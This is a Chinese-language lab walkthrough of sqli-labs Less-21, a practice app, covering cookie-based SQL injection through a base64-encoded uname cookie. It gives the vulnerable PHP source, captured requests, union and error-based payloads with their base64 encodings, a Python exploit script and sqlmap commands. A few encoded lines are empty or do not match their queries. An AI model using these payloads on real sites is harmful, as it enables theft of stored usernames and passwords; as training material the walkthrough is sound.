sqli-lab-less21
一、靶标地址
Less-21 POST-Dump into outfile -String
#输出文件
http://127.0.0.1/sqli/less-21/
二、漏洞探测
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#发现回显
#YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
#YOUR IP ADDRESS IS : 127.0.0.1
#DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
#YOUR COOKIE : uname = YWRtaW4= and expires: Sat 05 Aug 2023 - 06:05:35
#Your Login name:admin
#Your Password:admin
#Your ID:8
#可以发现uname这里疑似base64加密
#使用cyberchef进行base64解密 解密为admin
#抓包结果
#第一个包
POST /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
uname=admin&passwd=admin&submit=Submit
#第二个包
GET /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uname=YWRtaW4%3D
Connection: close
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if(!isset($_COOKIE['uname']))
{
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
echo "<div style='padding-top:10px; font-size:15px;'>";
echo "<!--Form to post the contents -->";
echo '<form action=" " name="form1" method="post">';
echo ' <div style="margin-top:15px; height:30px;">Username : ';
echo ' <input type="text" name="uname" value=""/> </div>';
echo ' <div> Password : ';
echo ' <input type="text" name="passwd" value=""/></div></br>';
echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
echo '<font size="3" color="#FFFF00">';
echo '<center><br><br><br>';
echo '<img src="../images/Less-21.jpg" />';
echo '</center>';
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
echo "<br>";
echo "<br>";
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
setcookie('uname', base64_encode($row1['username']), time()+3600);
//base64加密
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
header ('Location: index.php');
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
echo "</font>";
echo '</font>';
echo '</div>';
}
else
{
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo "<br><br><br><b>";
echo '<img src="../images/Less-21.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);#base64解密
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "pink" font size="5">';
echo 'Your Login name:'. $row['username'];#打印username
echo "<br>";
echo '<font color= "grey" font size="5">';
echo 'Your Password:' .$row['password'];#打印password
echo "</font></b>";
echo "<br>";
echo 'Your ID:' .$row['id'];
}
else
{
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/slap1.jpg" />';
echo "<br><br><b>";
//echo '<img src="../images/Less-20.jpg" />';
}
echo '<center>';
echo '<form action="" method="post">';
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
echo '</form>';
echo '</center>';
}
else
{
echo '<center>';
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo '<font color= "#FFFF00" font size = 6 >';
echo " Your Cookie is deleted";
setcookie('uname', base64_encode($row1['username']), time()-3600);//base64加密
header ('Location: index.php');
echo '</font></center></br>';
}
echo "<br>";
echo "<br>";
//header ('Location: main.php');
echo "<br>";
echo "<br>";
//echo '<img src="../images/slap.jpg" /></center>';
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Cookie:'.$cookee."\n");
fclose($fp);
}
?>
业务流程同less-20,只不过加入base64加密和解密,在需要查询的时候解密,在要设置的解密
提交coookie的时候是加密的
四、黑盒与白盒测试
$cookee = base64_decode($cookee);#base64解密
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
第一个是让语法报错,函数报错回显
echo 'Your Password:' .$row['password'];#打印password
第二个是password回显
#首先进行探测语句
uname=1'
uname=MSc=
#Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
猜测语句'1'') LIMIT 0,1
推断语句为select * from xxx where username=('$username') limit 0,1;
联合查询
#获取数据库 用户版本号
uname=1') union select database(),user(),version() #
uname=MScpIHVuaW9uIHNlbGVjdCBkYXRhYmFzZSgpLHVzZXIoKSx2ZXJzaW9uKCkgIw==
#获取表名
uname=1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #
uname=MScpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyAj
#获取字段名
uname=1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #
uname=MScpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyAj
#获取字段值
uname=1') union select (select group_concat(username) from users),(select group_concat(password) from users),3 #
uname=MScpIHVuaW9uIHNlbGVjdCAoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDMgIw==
1、floor()函数报错
#获取数据库 用户 版本号
Cookie:
uname=1') and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IGNvbmNhdCh2ZXJzaW9uKCksMHgzYSwweDNhLGRhdGFiYXNlKCksMHgzYSwweDNhLHVzZXIoKSwweDNhKWxpbWl0IDAsMSksZmxvb3IocmFuZCgwKSoyKSl4IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBncm91cCBieSB4KWEpICM=
#因为update语句无法使用union select,所以用and并将后面()
#获取表名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQodGFibGVfbmFtZSwweDNhLDB4M2EpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSAj
#获取列名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQoY29sdW1uX25hbWUsMHgzYSwweDNhKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMSwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgIw==
#获取用户名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQodXNlcm5hbWUsMHgzYSwweDNhLHBhc3N3b3JkLDB4M2EsMHgzYSkgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAxLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSAj
2、updatexml()函数报错
#获取数据库名
Cookie:
uname=1') and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLGRhdGFiYXNlKCksJ34nLHVzZXIoKSwnficsdmVyc2lvbigpKSwxKSAj
#获取表名
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGxpbWl0IDAsMSkpLDApICM=
#获取列名
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnKSksMCkgIw==
#获取列字段
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSwwKSAj
3、extractvalue()函数报错
#获取当期数据库名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select database()))) #
uname=
#获取表名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSkgIw==
#获取列名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnKSkpICM=
#获取列字段
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSkgIw==
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSkgIw==
五、脚本撰写
import requests
import base64
url="http://192.168.128.159/sqli/less-21/index.php"
payload = "1') and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #"
payload_encode = "uname=" + str(base64.b64encode(payload.encode('utf-8')),encoding="utf-8")
#这里需要直接使用str会转换成b'hello',只有变成str(a,encoding="utf-8")时才会变成hello
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Cookie': payload_encode
}
postdata = {
"uname" : "admin",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=postdata)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/less-21/index.php" --cookie --level 3 --batch
#未探测出
sqlmap -r target.txt --batch
#未探测出
GET /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: *
Connection: close
七、总结
1、base64加解密的脚本撰写